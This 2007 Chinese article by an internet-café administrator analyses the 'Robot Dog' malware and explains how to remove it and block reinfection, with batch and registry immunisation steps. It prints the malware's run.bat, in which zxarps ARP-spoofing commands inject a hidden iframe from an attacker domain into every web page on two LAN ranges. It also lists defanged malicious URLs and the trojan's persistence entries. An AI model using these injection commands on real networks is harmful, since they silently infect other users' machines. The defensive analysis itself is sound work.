决战机器狗病毒
作者:梁泽滨&无情剑客
(注:本文部分内容引用网络上的资料。)
告别了“熊猫烧香”的日子,网络总算是平静了一段时间。但好景不长,跟着迎来的是“机器狗”病毒,这个病毒摧残着全国各地的网吧,家庭用户也饱受折磨。其影响力能比得上前段时间的“熊猫烧香”病毒。它最主要的特征是能穿透网吧还原系统,不断从网上加载病毒。下面我将详细地给大家介绍一下“机器狗”病毒。
大概在月中旬,我就听说一个名为“机器狗”的病毒。据说能穿透网吧的还原系统(包括还原卡和其他还原软件),加载其他病毒,开始我还不怎么相信的。直到2007年月29日有人在一个论坛中发了一个“机器狗”病毒的样本出来,我自己下载来测试后结果惊人,在安装冰点还原的环境下,运行这个病毒竟然在重新启动之后加载了很多病毒。我运行了多次才出现这个结果的,开头的两次都没有穿透还原系统。开始这个病毒是没有名字的,可能是因为它的图标是的机器狗啊宝吧(图)
1.jpg (3.16 KB)
2007-12-27 10:17 PM
,所以网友们都称它为机器狗,这样“机器狗”就诞生在网络中了。
反病毒专家分析,“机器狗”病毒运行后,会在%WinDir%\System32\drivers 目录下释放出一个名为pcihdd.sys 的驱动程序,该文件会接管冰点或者硬盘保护卡对硬盘的读写操作,这样该病毒就破解了还原系统的保护,使冰点、硬盘保护卡实效,达到转存病毒的效果。机器狗病毒起初就加载几个小木马,但是从11月下旬开始就变种很频繁,还利用MS06-014和MS07-017系统漏洞传播,目前最新的变种就是利用RealPlayer播放器漏洞传播的。机器狗还通过ARP欺骗跟网页木马相结合传播病毒,使其传播力大大增加,当局域网中的一台电脑中了病毒之后,这个病毒会利用ARP欺骗,插入恶意代码,致使其他用户访问网页时弹出恶意网页,此网页一般利用MS07017漏洞加载病毒。
我是在网吧工作的,所以我对这个病毒比较熟悉,因为我们网吧也中招了,弄了两天才把这个病毒控制下来。下面是我对这个病毒的认识和查杀方法,希望能帮到大家。刚开始的时候,我们网吧的系统是很正常的,突然电影服务器有问题了,客户机看完一部电影之后,再看其他电影的时候提示连接地址错误。第二、就是虚拟磁盘服务器很卡,客户机连接慢死了,客户整天在骂网络为什么这么卡,我开始还以为是服务器的问题,但是后来才知道不是。第三、就是部分电脑玩跑跑卡丁车时会自动关闭,并且其他文件打开不了,这次可把我吓晕了,系统好好的,应该没有问题。于是在网上查找原因,才知道跑跑卡丁车是自带反外挂功能的,估计是我的电脑中病毒导致游戏不能运行的。但是客户机都安装了迅闪3.0还原软件,这使我想起了“机器狗”病毒了。电脑重新启动后感觉好卡,打开任务管理器看看竟然有30多个进程,还不停的加载新的进程,我当时晕倒(夸张了一点)。这下我确定是中了传说中的机器狗病毒了。接着下来就是我对战“机器狗”病毒了。
首先拔掉网线,重新启动进入系统之后,发觉系统正常得很,没有像刚才那样卡了。于是再插上网线看看,也没有发现什么不正常的。真的很奇怪吖,于是再重启一遍。奇迹终于出现啦,光标不停地闪动,说明后台在运行程序。跟着打开任务管理器看看,进程多得要命,那些进程还不停的变,我发现一个比较熟悉的进程userinit.exe。这个Userinit.exe是Windows操作系统一个关键进程。用于管理不同的启动顺序,例如在建立网络链接和Windows壳的启动。Userinit.exe属于系统进程,在后台运行的,并且不使用网络。正常情况下这个文件是在刚开机的时候才启动的,系统现在运行了这么久还在,我估计这个文件有点问题。于是用“Userinit.exe”去百度搜索一下,才知道当“机器狗”运行时释放出pcihdd.sys后,并且对Userinit.exe进行修改,经过修改后的Userinit.exe文件,当网络链接畅通后,则从hxxp://yu.8s7.net/cert.cer下载列表。于是把hxxp://yu.8s7.net/cert.cer这个文件下载下来研究了一下。用记事本打开之后(如图2)
2.jpg (21.4 KB)
2007-12-27 10:17 PM
出现一些图片的连接地址。奇怪了,病毒的作者为什么要连接一些图片呢?别管那么多,先下载下来看看,下载下来后双击运行后,什么都没有(图3)
3.jpg (21.18 KB)
2007-12-27 10:17 PM
。根本就不是什么图片,大概应该是修改了后缀名来实现逃避杀毒软件的追杀,为了证明这个想法我做了一个测试,随便将一个EXE文件修改一下后缀名为BMP的,运行了一下跟上面的情况一样。但是这个逃避查杀的方法并不是对所有杀毒软件都管用的,我用金山测试了是不能实现的。这个猜想在后面得到了证实是用于伪装的,我发现temp文件夹有一个文件为explorer.bmp文件,explorer.bmp这个名字也太特别了吧!我将文件后缀修改成EXE一看,出现了机器狗的图标(图4)。
4.jpg (5.59 KB)
2007-12-27 10:17 PM
(注:开始的时候,机器狗的进程名为explorer.exe,现在为conime.exe,并且不断更换为conime1.exe、conimez.exe等等)。
前面说到机器狗病毒是通过MS06014跟MS07017漏洞传播的,首先我们来了解一下这些漏洞。先看看MS07017漏洞分析:攻击者可能会利用此问题危及Windows系统的安全,并获取对该系统的控制权,无论用户使用的是IE6、IE7、还是Firefox、Opera等浏览器;无论是Microsoft 2000、XP、2003,还是最新的Vista操作系统,均无法幸免于难。已有大量木马、病毒、恶意程序、蠕虫病毒使用该漏洞进行传播,绝大数反病毒软件、防漏洞软件、主动防御软件失效。该漏洞的利用通常伪装成一个图片,只要点击了带有恶意代码图片的网站或邮件,就会被感染上恶意程序。
既然这个漏洞的利用空间这么大,骇客肯定会利用它了。机器狗利用色情网站传播病毒在色情网站插入恶意网页(即MS07017网页木马),当我们访问时就会利用漏洞加载病毒到我们的机器,这里我给大家列几个有机器狗病毒的网页出来:
hxxp://www.11sss.com
hxxp://www.22ccc.com
hxxp://www.77bbb.com
hxxp://www.22aaa.com
hxxp://www.11mmm.com
这样命名的色情网站一般都被挂了这个病毒,还有其他网站被挂了这个病毒,具体列表请看hxxp://bbs.txwm.com/printpage.asp?BoardID=190&ID=727832 。既然这些网站被挂了病毒,我们必需把它们限制用户访问,网吧管理员可以通过路由限制访问IP功能把这些网站给屏蔽了,页可以通过修改HOST文件屏蔽。家庭用户建议用HOSTS文件屏蔽,打上最新的系统补丁,再把杀毒软件升级到最新版本。HOSTS文件修改方法如下:用记事本打开%SystemRoot%\system32\drivers\etc下的HOSTS文件进行修改(如图5)。
5.jpg (28.28 KB)
2007-12-27 10:17 PM
将恶意网站指向本地,使其不能访问。据说江民出了一个机器狗免疫,就是利用修改HOSTS文件,使用户不能访问带病毒的网站,这样治标不治本的方法,让网盟的人笑个够。不让用户访问带病毒的网站,不如给IE打个补丁,使网页木马不能被执行,这里我给大家介绍一个上海绿茶的网页木马自动下载病毒免疫补丁(图6)。
6.jpg (13.06 KB)
2007-12-27 10:17 PM
只要打上这个补丁之后,网页木马就无法执行了,经过测试成功(测试网站为:hxxp://1.22ccc.com),这样就很有效地防止了病毒通过网页传播了。(提示:realplay广告去除完美补丁也要装上去,预防病毒在RM文件插入病毒网页).
已经中了这个病毒的朋友请注意了,中了病毒之后,系统不断加载很多病毒木马,会导致系统缓慢,严重时会造成死机。又或者你发现经常有ARP攻击、局域网通讯不流畅、网吧电影服务器跟客户机通讯异常、虚拟磁盘服务器负荷大等等情况,这个时候你就要提醒警惕了,很可能你网吧中了这个病毒了,检查方法就是将全部机器都开启,再用网络执法官检测一下客户机的ARP数据(如图7)
7.jpg (199.35 KB)
2007-12-27 10:17 PM
如果发现客户机的ARP流量大于10就要注意了,因为很可能中了机器狗病毒的。客户机的ARP流量不断升高,就99%中了机器狗病毒,就应该过去检查一下有没有什么特别的进程了。但是某些游戏也会导致客户机的ARP流量升高的,如跑跑卡丁车和泡泡堂,不过都控制在10到80这个幅度。中了机器狗最明显的一个特征就是有userinit.exe这个进程,如果系统正常的情况下,系统启动之后userinit.exe文件一般都会在10秒钟后自动关闭的,不会用网络通讯。但是中了病毒的userinit.exe文件就不正常了,在开机启动的时候代替正常的userinit.exe文件,并且连接网络之后从网上下载病毒,当病毒下载完毕才关闭自身。如果网络不通的情况下,userinit.exe永远是在运行状态的。所以我们想知道自己的还原系统有没有被穿透,应该先断掉网线,看看userinit.exe这个文件运行多长时间,如果超过1分钟就100%是中了机器狗病毒了。中了狗狗的朋友别慌张,其实清除它并不难的,下面就开始杀狗了,天气冻了啊,打火锅也不错的^_^。
首先断掉网线,然后将userinit.exe进程关闭掉。这样就防止userinit.exe从网上加载病毒了,这个时候绝对不能用IE上网下载软件,因为如果中了病毒的局域网会存在ARP欺骗攻击的,无论局域网哪台电脑访问什么网页都会插入指定的网页的。你应该通过局域网共享方式访问文件,这样比较安全。将userinit.exe结束之后,再用GHOST镜像浏览器V11.EXE将镜像文件里面的userinit.exe提取出来,因为从镜像文件提取出来就肯定没有病毒了,然后用这个没有被感染的文件替换现在这个userinit.exe。覆盖之后还得打上免疫补丁,如果不打免疫等于白干了啊。我们来看看这个免疫吧:
echo off
cls
rem
★无情剑客★
rem
QQ:410868408
color 0b
title
:%systemroot%\system32\
cd /d "%systemroot%\system32\"
md packet.dll
md pthreadVC.dll
md wpcap.dll
%systemroot%\system32\attrib +s +h +r packet.dll
%systemroot%\system32\attrib +s +h +r pthreadVC.dll
%systemroot%\system32\attrib +s +h +r wpcap.dll
echo y|%systemroot%\system32\cacls packet.dll /d everyone
echo y|%systemroot%\system32\cacls pthreadVC.dll /d everyone
echo y|%systemroot%\system32\cacls wpcap.dll /d everyone
:%systemroot%\system32\drivers\
cd /d "%systemroot%\system32\drivers\"
md npf.sys
md pcihdd.sys
%systemroot%\system32\attrib +s +h +r npf.sys
echo y|%systemroot%\system32\cacls npf.sys /d everyone
%systemroot%\system32\attrib +s +h +r pcihdd.sys
echo y|%systemroot%\system32\cacls pcihdd.sys /d everyone
echo
这个批处理的原理就是建立病毒要生成的文件,修改其属性并且限制其访问的权限。其目的就是为了不让病毒生成所需要的文件,破坏病毒的功能。只要将上面的代码写成批处理文件运行就可以免疫机器狗的穿透了,如果在打了补丁的情况下运行机器狗病毒会提示加载驱动不成功的(如图8)。
8.jpg (7.12 KB)
2007-12-27 10:17 PM
这样狗狗就运行不了啊,哈哈。(提示:用这个方法替换了userinit.exe文件是属于临时解决方法,建议中了病毒的网吧用户重新做母盘,因为机器狗病毒作者说不定什么时候不通过userinit.exe加载病毒,如果将这个穿透文件变为smss.exe等其他系统文件,我们就很难以预防了。)上面这个免疫补丁推荐使用冰点还原的客户使用,如果使用迅闪还原的朋友,请升级版本为3.1。迅闪还原3.1 Build 0905以后的版本增加了对机器狗的防御功能(如图9)。
9.jpg (24.58 KB)
2007-12-27 10:17 PM
但是安装免疫之前要确保系统没有中病毒,建议先GHOST还原系统后再安装。
对于家庭用户中了机器狗病毒,我有如下建议:1.最好就是重新安装系统,安装好杀毒软件并且把病毒库升级到最新,把补丁打好就OK了。2.对于不想重新安装系统的用户建议用qqkav闪电查杀,不过记得把“抑制病毒再生”这个功能选上(图10),
10.jpg (91.82 KB)
2007-12-27 10:17 PM
因为这样查杀后能防止部分病毒再发作,相当做了免疫。有些用户查杀之后只能登陆QQ,但是无法上网,这种情况是因为病毒修改了winsock设置,病毒体文件被杀掉后,系统找不到相应的网络设置,导致不能上网。在"系统修复"-"Winsock提供者","重置Winsock"即可。其实杀毒软件也不是万能的,我们自己也要做一些预防工作,在这里我介绍大家用“IFEO映像挟持”,我们在注册表下功夫,禁止指定的程序运行,用qqkav可以列表出来的。图11是我挟持的程序名,如果运行上面的文件就会提示错误,这样那些病毒就运作不了。其方法是将下面代码保存为批处理运行:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IGM.exe" /v debugger /t reg_sz /d Explorer.exe /f
大家应该看到上面的IGM跟IGW了吧,刚开始的时候很多人都以为这两个病毒是机器狗的变种,其实不是的。IGM和IGW只是userinit.exe加载下来的一个小病毒,现在用出了一个VML了。我真的被一些人气晕了,又说机器狗变种了。其实机器狗一直都没有变种的,只是它加载的病毒换作其他罢了,加上传播的方式的改变,另一些人以为变种了。我当初用的机器狗免疫到现在还起作用,还可以防止穿透还原系统,那么你们还怎么说机器狗变种了啊?一些更加可笑,说机器狗最新变种罢以前的免疫都摧毁了,弄的网络一片惊慌。
鉴于这么多网友认为是机器狗“变种”了,我就对机器狗加载下来的病毒分析一下吧,首先来分析一下IGM吧,这个病毒名字在网上随处可见。中了IGM病毒之后,我用冰刃查看了进程发现有三个可疑的程序在运行:
C:\WINDOWS\IGM.exe
C:\WINDOWS\svchost.exe
C:\WINDOWS\swchost.exe
C:\WINDOWS\IGM.exe
并且启动组多了很多启动项目:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
svchost
C:\WINDOWS\svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinForm
C:\WINDOWS\WinForm.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
upxdnd
C:\WINDOWS\upxdnd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GenProtect
C:\WINDOWS\GenProtect.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
NVDispDrv
C:\WINDOWS\NVDispDrv.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MsIMMs32
C:\WINDOWS\MsIMMs32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AVPSrv
C:\WINDOWS\AVPSrv.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
cmdbcs
C:\WINDOWS\cmdbcs.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Kvsc3
C:\WINDOWS\Kvsc3.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinSysM
C:\WINDOWS\IGM.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinSysW
C:\WINDOWS\swchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
KVP
C:\WINDOWS\system32\drivers\svchost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
DbgHlp32
C:\WINDOWS\DbgHlp32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MsPrint32D
C:\WINDOWS\MsPrint32D.exe
这些病毒是通过userinit.exe开机加载下来的,首先是加载下来的是IGM.EXE文件,跟着这个IGM释放出其他病毒木马,经过检测为魔域、传奇、魔兽世界木马。针对IGM病毒,我写了一个批处理查杀工具。这里就不列出代码了,我打包放光盘去,好让大家研究一下。
现在又出现了一个VML.EXE了,这个文件是我最新截获的病毒体,其实这个并不是什么新病毒,只是一个ARP欺骗工具,它的真是名字为:zxarps.exe。为什么我这么肯定是zxarps.exe呢?是因为我拿到一个病毒样本了,它是一个自解压文件来的,解压后有如下文件(图11
11.jpg (92.49 KB)
2007-12-27 10:17 PM
12.jpg (18.22 KB)
2007-12-27 10:17 PM
)。我们先打开3.vbs看看(如图13)
13.jpg (11.02 KB)
2007-12-27 10:17 PM
,说明3.vbs是用于驱动run.bat文件用的。再来研究一下这个run.bat吧,代码如下:
Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src='hxxp://xx.exiao01.com/2.htm' width=20 height=1></iframe>"
Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert "<iframe src='hxxp://xx.exiao01.com/2.htm' width=20 height=1></iframe>"
Exit
我们看看是不是很熟悉啊?没错,正是zxarps.exeARP欺骗工具的用法,这些代码的意思就是对指定的IP段中的用户访问的所有网站都插入一个框架代码,这里就定义了IP为192.168.0.1-192.168.0.254跟192.168.1.1-192.168.1.254为目标用户,当用户使用浏览器访问网络时就会自动插入一个框架代码(就是插入恶意网页)。我们接着来看看hxxp://xx.exiao01.com/2.htm是什么东东吧。当访问这个网页的时候只有一张小图片,跟着就下了很多病毒下来。嘿嘿,这个正是我们前面所讲到的MS07017漏洞的利用,也叫ANI动态光标漏洞吧。既然是网页木马,我们也去追查个彻底,view-source:hxxp:// xx.exiao01.com/2.htm来看看它的网页代码写着什么(由于写文章的时候,这个网站关闭了,所以无法截图),hxxp:// xx.exiao01.com/2.htm还插入了3.htm、4.htm、5.htm,还有一个最特别的就是流量统计的连接,想不到病毒也这么先进了啊,竟然会利用流量统计来统计一下有多少访问过这个网页。
这个病毒样本里面还有其他DLL文件就是winpcap释放出来的,利用zxarps.exe欺骗必需安装winpcap,这里可能有些朋友会想不明白winpcap是怎么安装上去的,其实winpcap也有个版本是在CMD下安装的,所以这个不奇怪。
对于这个病毒就研究到这里了,我们再回顾一下这个病毒利用原理:1.用机器狗病毒自身将userinit.exe穿透还原软件,系统连接网络后从网上下载更多的病毒。2.再通过ARP欺骗插入网页框架使局域网感染更多的机器。3.网页木马中插入其他病毒和机器狗本身。最近还发现某些加载下来的病毒会删除GHOST备份文件。
防御方法总结:
1.把系统补丁打全,防止病毒利用漏洞传播。
2.打上网页木马自动下载病毒免疫补丁,防止通过网页木马传播病毒
3.将realplay升级,防止溢出漏洞。机器狗病毒也利用realplay最新漏洞传播
4.打上机器狗免疫补丁,防止还原系统被穿透。
5.对所有机器进行IP和MAC病毒,防止病毒ARP欺骗时造成掉线。
6.安装网络监控工具,例如ARP防火墙跟网络执法官。随时检测网络状况,杜绝病毒蔓延。
7.远程调用修改过的HOSTS文件,限制用户访问带病毒网页,减少中毒几率。也可以用路由
限制访问某些网站。
这个病毒把我害得很惨,我恨不得杀了这个病毒作者,由于服务器坏了调用不到免疫文件,
导致我这里几百台电脑都中了,所以我查杀这个病毒用了不少时间,做了两个通宵。而且朋
友的黑网吧也中了,找我帮忙。真的把我累死了。所以我就写了这篇文章供大家研究研究,
好让被机器狗病毒摧残的朋友得到解脱。如果文章有什么不足之处,敬请原谅。因为本人是
菜鸟一只,欢迎大家指出错误或者提建议,如果有什么不明白的,可以加我QQ:410868408进行交流。
